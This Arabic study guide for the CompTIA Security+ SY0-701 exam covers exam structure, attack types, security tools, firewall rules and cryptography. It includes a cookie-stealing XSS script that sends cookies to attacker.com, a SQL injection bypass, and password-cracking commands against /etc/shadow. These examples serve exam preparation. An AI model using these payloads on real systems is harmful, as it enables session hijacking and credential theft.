🛡️ دليل CompTIA Security+ SY0-701 الشامل

دليلك الكامل للجزء العملي والنظري

📝 75 - 90 سؤال ⏱️ 90 دقيقة 🎯 750/900 للنجاح 💻 5-6 أسئلة عملية

تعلم

📋 نظرة عامة شاملة

ما هو اختبار CompTIA Security+؟

CompTIA Security+ هو شهادة عالمية معترف بها في مجال أمن المعلومات، وتعتبر من الشهادات الأساسية للمبتدئين والمحترفين في مجال الأمن السيبراني. نسخة SY0-701 هي أحدث نسخة تم إطلاقها في نوفمبر 2023.

هيكل الاختبار التفصيلي

أنواع الأسئلة:

📝

Multiple Choice (MCQ)

اختيار من متعدد - الأكثر شيوعاً في الاختبار

💻

Performance-Based (PBQ)

أسئلة عملية تفاعلية - 5-6 أسئلة

🔤

Drag and Drop

سحب وإفلات العناصر في المكان الصحيح

توزيع الوقت المقترح:

الأسئلة العملية (PBQ) - شرح مفصل

ما هي الأسئلة العملية؟

الأسئلة العملية هي محاكاة تفاعلية لمهام حقيقية في أمن المعلومات. تتطلب منك تطبيق معرفتك في بيئة عملية بدلاً من مجرد اختيار إجابة.

أمثلة على أنواع الأسئلة العملية:

🔍 تحليل السجلات (Log Analysis)

ستُعطى ملف سجل كامل وعليك:

  • تحديد محاولات الاختراق
  • إيجاد عناوين IP المشبوهة
  • تحليل أنماط الهجمات
  • تحديد وقت الهجوم

🔥 تكوين Firewall

تكوين قواعد جدار الحماية لـ:

  • السماح بخدمات محددة (HTTP, HTTPS, SSH)
  • منع حركة المرور من مصادر معينة
  • تطبيق مبدأ Least Privilege
  • ترتيب القواعد بشكل صحيح

📊 تحليل حركة الشبكة

باستخدام Wireshark أو أداة مشابهة:

  • تحديد نوع الهجوم (DDoS, MITM, Port Scan)
  • تحليل البروتوكولات المستخدمة
  • إيجاد الحزم المشبوهة
  • تتبع الاتصالات
الأسئلة العملية تظهر عادة في بداية الاختبار. يمكنك تخطيها والعودة إليها لاحقاً إذا كنت تريد توفير الوقت للأسئلة الأسهل أولاً.

كيف يتم التقييم؟

📚 المجالات الخمسة بالتفصيل

Domain 1: General Security Concepts (12%)

12%

المواضيع الرئيسية:

فهم CIA Triad أساسي جداً - كل سؤال تقريباً يمكن ربطه بأحد هذه المبادئ الثلاثة.

Domain 2: Threats, Vulnerabilities & Mitigations (22%)

22%

أنواع التهديدات:

الثغرات الشائعة:

Domain 3: Security Architecture (18%)

18%

مكونات معمارية البنية الأمنية:

Domain 4: Security Operations (28%)

28% - الأكبر!

العمليات الأمنية اليومية:

هذا المجال هو الأهم ويحتوي على أكبر نسبة من الأسئلة! احفظ خطوات Incident Response بالترتيب.

Domain 5: Security Program Management & Oversight (20%)

20%

إدارة البرنامج الأمني:

🎓 نصائح النجاح والتفوق في الاختبار

استراتيجية الإجابة على الأسئلة

📖 كيف تقرأ السؤال بشكل صحيح

الكلمات المفتاحية المهمة:

  • "BEST": قد تكون هناك أكثر من إجابة صحيحة، لكن واحدة هي الأفضل
  • "MOST secure": ابحث عن الحل الأكثر أماناً حتى لو كان مكلفاً
  • "LEAST expensive": الأمان مهم لكن التكلفة عامل حاسم
  • "FIRST": الخطوة الأولى في العملية
  • "NEXT": ما هي الخطوة التالية؟
  • "PRIMARY": السبب أو الحل الرئيسي
  • "IMMEDIATELY": الإجراء العاجل الفوري
اقرأ السؤال مرتين! المرة الأولى لفهم السياق، والثانية للتركيز على الكلمات المفتاحية.
✂️ تقنية الاستبعاد

الخطوات:

  1. اقرأ جميع الخيارات أولاً
  2. استبعد الإجابات الخاطئة بوضوح
  3. من الخيارات المتبقية، ابحث عن الأفضل
  4. لا تختر أول إجابة تبدو صحيحة

علامات الإجابات الخاطئة:

  • تحتوي على كلمات مطلقة: "دائماً"، "أبداً"، "كل"، "لا شيء"
  • معقدة جداً أو تقنية جداً بدون سبب
  • تتعارض مع أفضل الممارسات الأمنية
  • تستخدم تقنيات قديمة أو غير آمنة
🎯 التعامل مع السيناريوهات

عند قراءة سيناريو:

  • حدد المشكلة الأساسية
  • لاحظ القيود (الميزانية، الوقت، الموارد)
  • ركز على المتطلبات الأمنية المحددة
  • تجاهل المعلومات غير الضرورية (التشويش)
  • فكر في تأثير كل حل على CIA Triad

إدارة الوقت في الاختبار

⏱️ خطة الـ 90 دقيقة

الخيار 1: PBQ أولاً

  • 0-50 دقيقة: الأسئلة العملية
  • 50-75 دقيقة: MCQ
  • 75-90 دقيقة: مراجعة

الميزة: تنتهي من الأصعب وعقلك نشيط

الخيار 2: MCQ أولاً

  • 0-30 دقيقة: MCQ
  • 30-75 دقيقة: الأسئلة العملية
  • 75-90 دقيقة: مراجعة

الميزة: تكسب ثقة بالإجابات السريعة

الخيار 3: المختلط

  • قم بعمل pass سريع
  • أجب عن السهل فوراً
  • علّم الصعب وارجع له
  • وزع وقتك بالتساوي

الميزة: مرونة أكبر

لا تقضِ أكثر من 3 دقائق على سؤال واحد! علّمه وارجع له لاحقاً. الوقت ثمين!

نصائح إدارة الوقت:

المفاهيم الأساسية - يجب إتقانها!

🎯 CIA Triad - القاعدة الذهبية

كل سؤال تقريباً يمكن ربطه بأحد هذه المبادئ:

Confidentiality (السرية):

  • التشفير: AES, RSA, TLS
  • التحكم بالوصول: ACLs, Permissions
  • أمثلة الهجمات: Eavesdropping, MITM

Integrity (التكامل):

  • الهاشينج: SHA-256, HMAC
  • التوقيعات الرقمية: RSA signatures
  • أمثلة الهجمات: MITM, Data tampering

Availability (التوافرية):

  • Redundancy: RAID, Clustering
  • Backups: Full, Incremental, Differential
  • أمثلة الهجمات: DoS, DDoS, Ransomware
🔄 Incident Response - احفظ الترتيب!
الخطوات بالترتيب (مهم جداً!): 1. Preparation (التحضير) 2. Identification (التحديد) 3. Containment (الاحتواء) 4. Eradication (الإزالة) 5. Recovery (الاستعادة) 6. Lessons Learned (الدروس المستفادة) اختصار للحفظ: P-I-C-E-R-L
التشفير من أهم المواضيع في الاختبار! احفظ الفرق بين Symmetric و Asymmetric، ومتى تستخدم كل نوع.

🎉 رسالة أخيرة

أنت الآن جاهز للاختبار!

CompTIA Security+ ليس مجرد شهادة، بل هو أساس قوي لمسيرتك في أمن المعلومات. كل ما درسته هنا سيفيدك في حياتك المهنية.

✨ تذكر:

  • 🎯 الثقة بالنفس نصف النجاح
  • 📚 المعرفة التي اكتسبتها كافية
  • ⏰ أدر وقتك بحكمة
  • 🤔 فكر قبل أن تجيب
  • 💪 لا تستسلم أبداً

بالتوفيق! أنت قادر على النجاح 🚀

"Security is not a product, but a process" - Bruce Schneier

🔧 الأدوات الأساسية - شرح مفصل

أدوات فحص الشبكات والاختراق

Nmap (Network Mapper)

الوصف: أقوى أداة لفحص الشبكات واكتشاف الأجهزة والخدمات

الاستخدامات الرئيسية:

  • اكتشاف الأجهزة الحية على الشبكة
  • فحص المنافذ المفتوحة
  • تحديد نظام التشغيل
  • كشف الخدمات والإصدارات

أمثلة عملية:

# فحص بسيط للمنافذ nmap 192.168.1.1 # فحص SYN (أسرع وأكثر سرية) nmap -sS 192.168.1.0/24 # فحص شامل مع تحديد OS والخدمات nmap -A -T4 192.168.1.1 # فحص منافذ محددة nmap -p 80,443,22 192.168.1.1 # فحص كل المنافذ nmap -p- 192.168.1.1 # فحص UDP nmap -sU 192.168.1.1
Wireshark

الوصف: محلل حزم الشبكة الأكثر شعبية في العالم

الاستخدامات:

  • تحليل حركة المرور بالتفصيل
  • كشف الهجمات والأنشطة المشبوهة
  • فحص البروتوكولات
  • استكشاف مشاكل الشبكة

الفلاتر المهمة في Wireshark:

# عرض حركة HTTP فقط http # عرض حركة من/إلى IP محدد ip.addr == 192.168.1.100 # عرض حركة TCP على منفذ معين tcp.port == 80 # عرض حزم SYN tcp.flags.syn == 1 # عرض حركة DNS dns # عرض حزم تحتوي على كلمة معينة frame contains "password"

أدوات فحص الثغرات (Vulnerability Scanners)

Nessus

الوصف: أشهر أداة تجارية لفحص الثغرات الأمنية

ما يكشفه Nessus:

  • الثغرات المعروفة (CVEs)
  • التكوينات الضعيفة
  • كلمات المرور الافتراضية
  • البرامج غير المحدثة
  • المنافذ المفتوحة غير الضرورية
Nikto

الوصف: فاحص ثغرات خوادم الويب

# فحص موقع ويب nikto -h http://example.com # فحص HTTPS nikto -h https://example.com -ssl # حفظ النتائج nikto -h http://example.com -o results.html -Format htm

أدوات كسر كلمات المرور

John the Ripper

الوصف: أداة قوية لكسر كلمات المرور المشفرة

أنواع الهجمات المدعومة:

  • Dictionary Attack: استخدام قاموس كلمات
  • Brute Force: تجربة كل الاحتمالات
  • Hybrid: مزيج بين القاموس والقوة الغاشمة
# كسر ملف /etc/shadow john /etc/shadow # استخدام قاموس معين john --wordlist=/path/to/wordlist.txt hashes.txt # عرض النتائج john --show hashes.txt
Hashcat

الوصف: أسرع أداة لكسر الهاشات باستخدام GPU

# كسر MD5 hashcat -m 0 -a 0 hash.txt wordlist.txt # كسر SHA-256 hashcat -m 1400 -a 0 hash.txt wordlist.txt # Brute force hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

⚔️ أنواع الهجمات الإلكترونية

هجمات الهندسة الاجتماعية (Social Engineering)

🎣 Phishing

الوصف: رسائل بريد إلكتروني مزيفة تحاول خداع الضحية

المؤشرات:

  • عنوان مرسل مشبوه
  • روابط غير موثوقة
  • أخطاء إملائية
  • طلبات عاجلة
📞 Vishing

الوصف: Phishing عبر المكالمات الهاتفية

مثال: شخص ينتحل صفة موظف بنك ويطلب معلومات الحساب

💬 Smishing

الوصف: Phishing عبر الرسائل النصية (SMS)

مثال: رسالة تدعي أن حسابك تم إيقافه وتطلب الضغط على رابط للتحقق

البرمجيات الخبيثة (Malware)

🦠 Virus

الخصائص:

  • يحتاج لملف مضيف للعمل
  • يتكاثر عند تنفيذ الملف
  • ينتشر عبر الملفات
🐛 Worm

الخصائص:

  • ينتشر تلقائياً بدون تدخل المستخدم
  • لا يحتاج لملف مضيف
  • ينتشر عبر الشبكة
🔐 Ransomware

الوصف: يشفر ملفات الضحية ويطلب فدية

أمثلة شهيرة: WannaCry, Cryptolocker, Petya

الوقاية: نسخ احتياطية منتظمة، تحديثات، تدريب الموظفين

هجمات التطبيقات (Application Attacks)

💉 SQL Injection

الوصف: حقن أوامر SQL خبيثة في استعلامات قاعدة البيانات

مثال على الهجوم:

# استعلام طبيعي SELECT * FROM users WHERE username='admin' AND password='123456' # هجوم SQL Injection SELECT * FROM users WHERE username='admin'--' AND password='' # كل ما بعد -- يصبح تعليق

الوقاية:

  • استخدام Prepared Statements
  • Input Validation والتحقق من المدخلات
  • Least Privilege على قاعدة البيانات
  • WAF (Web Application Firewall)
🔗 Cross-Site Scripting (XSS)

الوصف: حقن JavaScript خبيث في صفحات الويب

الأنواع:

  • Stored XSS: الكود يُحفظ في قاعدة البيانات (الأخطر)
  • Reflected XSS: الكود ينعكس من URL أو Form
  • DOM-based XSS: يحدث في المتصفح فقط
# مثال على XSS <script>alert(document.cookie)</script> # سرقة الكوكيز <script> var cookie = document.cookie; window.location='http://attacker.com/?c='+cookie; </script>

🎯 السيناريوهات العملية المفصلة

سيناريو 1: تحليل سجلات النظام (Log Analysis)

📋 الموقف:

تم إعطاؤك ملف سجل من firewall أو web server وعليك تحديد الأنشطة المشبوهة

مثال على سجل مشبوه:

2024-10-26 03:15:22 192.168.100.50 FAILED login attempt - user: admin 2024-10-26 03:15:45 192.168.100.50 FAILED login attempt - user: admin 2024-10-26 03:16:12 192.168.100.50 FAILED login attempt - user: admin 2024-10-26 03:16:38 192.168.100.50 FAILED login attempt - user: administrator 2024-10-26 03:17:05 192.168.100.50 FAILED login attempt - user: root 2024-10-26 03:17:30 192.168.100.50 FAILED login attempt - user: admin 2024-10-26 03:17:55 192.168.100.50 SUCCESS login - user: admin

ما تبحث عنه:

سيناريو 2: تكوين جدار الحماية (Firewall Rules)

📋 المتطلبات:

شركة لديها web server على 192.168.1.10 وتحتاج:

  • السماح بـ HTTP و HTTPS من الإنترنت
  • السماح بـ SSH من شبكة الإدارة فقط (10.0.0.0/24)
  • السماح بـ RDP من جهاز المدير فقط (10.0.0.5)
  • منع كل حركة مرور أخرى (Default Deny)

القواعد الصحيحة:

# Rule 1: Allow HTTP from anywhere Action: Allow Protocol: TCP Source: Any (0.0.0.0/0) Destination: 192.168.1.10 Port: 80 Direction: Inbound # Rule 2: Allow HTTPS from anywhere Action: Allow Protocol: TCP Source: Any (0.0.0.0/0) Destination: 192.168.1.10 Port: 443 Direction: Inbound # Rule 3: Allow SSH from management network Action: Allow Protocol: TCP Source: 10.0.0.0/24 Destination: 192.168.1.10 Port: 22 Direction: Inbound # Rule 6: Default deny (يجب أن يكون الأخير) Action: Deny Protocol: Any Source: Any Destination: Any Direction: Both

💻 الأوامر والبروتوكولات - دليل شامل

أوامر الشبكات الأساسية

ping

الاستخدام: فحص الاتصال واختبار وقت الاستجابة

# Windows ping 8.8.8.8 ping -t 8.8.8.8 # مستمر ping -n 10 8.8.8.8 # 10 طلبات فقط # Linux/Mac ping 8.8.8.8 ping -c 10 8.8.8.8 # 10 طلبات ping -i 2 8.8.8.8 # كل ثانيتين
ipconfig / ifconfig / ip

الاستخدام: عرض وإدارة معلومات الشبكة

# Windows - ipconfig ipconfig # معلومات أساسية ipconfig /all # معلومات تفصيلية ipconfig /release # تحرير عنوان IP ipconfig /renew # تجديد عنوان IP ipconfig /flushdns # مسح DNS cache # Linux - ifconfig (قديم) ifconfig # عرض الواجهات ifconfig eth0 # واجهة محددة ifconfig eth0 down # إيقاف واجهة
netstat

الاستخدام: عرض الاتصالات الشبكية والمنافذ

# عرض كل الاتصالات والمنافذ netstat -an # عرض مع اسم البرنامج (Windows) netstat -anb # عرض مع PID (Linux) netstat -anp # عرض المنافذ المستمعة فقط netstat -l # Linux netstat -an | find "LISTENING" # Windows

المنافذ الشائعة - يجب حفظها!

المنفذ البروتوكول الوصف التشفير
20, 21 FTP نقل الملفات ❌ غير مشفر
22 SSH/SFTP الوصول الآمن عن بعد ✅ مشفر
23 Telnet الوصول عن بعد (قديم) ❌ غير مشفر
53 DNS نظام أسماء النطاقات ❌ عادة غير مشفر
80 HTTP صفحات الويب ❌ غير مشفر
443 HTTPS صفحات ويب مشفرة ✅ مشفر
3389 RDP Remote Desktop (Windows) ✅ مشفر

🔐 التشفير - شرح شامل

أنواع التشفير الرئيسية

🔑

Symmetric Encryption

التشفير المتماثل

نفس المفتاح للتشفير وفك التشفير

الميزات:

  • سريع جداً
  • مناسب للبيانات الكبيرة
  • مشكلة توزيع المفتاح

أمثلة: AES, DES, 3DES

🔐

Asymmetric Encryption

التشفير غير المتماثل

مفتاح عام للتشفير، مفتاح خاص لفك التشفير

الميزات:

  • حل مشكلة توزيع المفتاح
  • بطيء نسبياً
  • يستخدم للمفاتيح والتوقيعات

أمثلة: RSA, ECC, DSA

#️⃣

Hashing

الهاشينج

تحويل أحادي الاتجاه (لا يمكن عكسه)

الميزات:

  • ناتج ثابت الحجم
  • لا يمكن عكسه
  • للتحقق من التكامل

أمثلة: MD5, SHA-1, SHA-256

خوارزميات التشفير المتماثل

AES (Advanced Encryption Standard)

الوصف: المعيار الحالي للتشفير المتماثل

المواصفات:

  • أحجام المفاتيح: 128, 192, 256 بت
  • حجم البلوك: 128 بت
  • الاستخدام: تشفير الملفات، VPN، WiFi (WPA2/WPA3)
  • الأمان: آمن جداً ومعتمد عالمياً
DES (Data Encryption Standard)

الحالة: ⚠️ قديم وغير آمن - لا يُستخدم!

  • حجم المفتاح: 56 بت (ضعيف جداً)
  • يمكن كسره في ساعات
  • تم استبداله بـ 3DES ثم AES

خوارزميات التشفير غير المتماثل

RSA (Rivest-Shamir-Adleman)

الوصف: الأكثر شهرة للتشفير غير المتماثل

المواصفات:

  • أحجام المفاتيح: 1024, 2048, 3072, 4096 بت
  • الحد الأدنى الموصى به: 2048 بت
  • الاستخدام: تبادل المفاتيح، التوقيعات الرقمية، SSL/TLS
ECC (Elliptic Curve Cryptography)

الوصف: تشفير حديث وفعال

الميزات:

  • أمان أعلى بمفاتيح أصغر
  • 256-bit ECC = 3072-bit RSA (نفس مستوى الأمان)
  • أسرع وأقل استهلاكاً للموارد
  • مثالي للأجهزة المحمولة وIoT

دوال الهاش (Hash Functions)

MD5 (Message Digest 5)

الحالة: ❌ محطم وغير آمن - لا تستخدمه للأمان!

  • طول الناتج: 128 بت (32 حرف hex)
  • يمكن إيجاد Collisions (تصادمات)
  • يُستخدم فقط للتحقق من سلامة الملفات غير الحساسة
SHA-256

الحالة: ✅ آمن ومستخدم حالياً

  • طول الناتج: 256 بت (64 حرف hex)
  • جزء من عائلة SHA-2
  • مستخدم في البيتكوين وشهادات SSL/TLS
# حساب SHA-256 sha256sum file.txt # Linux certutil -hashfile file.txt SHA256 # Windows # باستخدام OpenSSL openssl dgst -sha256 file.txt
التشفير من أهم المواضيع في الاختبار! احفظ الفرق بين Symmetric و Asymmetric، ومتى تستخدم كل نوع.